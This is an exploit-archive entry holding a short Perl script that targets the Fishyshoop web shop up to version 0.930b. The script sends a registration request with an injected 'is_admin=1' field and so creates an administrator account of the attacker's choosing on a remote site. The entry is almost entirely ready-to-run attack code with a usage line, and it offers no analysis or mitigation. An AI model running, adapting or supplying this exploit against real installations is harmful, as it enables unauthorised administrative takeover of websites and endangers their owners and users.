id: 1319
date: 12/25/2006
title: Fishyshoop <= 0.930b Remote Add Administrator Account Exploit
author: James Gray
cves: 

=============================================================
Fishyshoop <= 0.930b Remote Add Administrator Account Exploit
=============================================================



#!/usr/bin/perl
# James Gray 
# Fishyshoop Security Vulnerability

use WWW::Curl::Easy;

sub usage() {
 print "$0 <Fishyshoop root URL> <Desired E-Mail> <Desired Password>\n";
 exit();
}

$FSURL=shift or usage(); $UNAME=shift or usage(); $PASS=shift or usage();

my $fishyshoop = new WWW::Curl::Easy;
$fishyshoop->setopt(CURLOPT_URL, "$FSURL?L=register.register");
$fishyshoop->setopt(CURLOPT_POST, 1);
$fishyshoop->setopt(CURLOPT_POSTFIELDS, "email=$UNAME&password=$PASS&is_admin=1&submit=1");
$fishyshoop->perform;




#  0day.today [2023-03-23]  #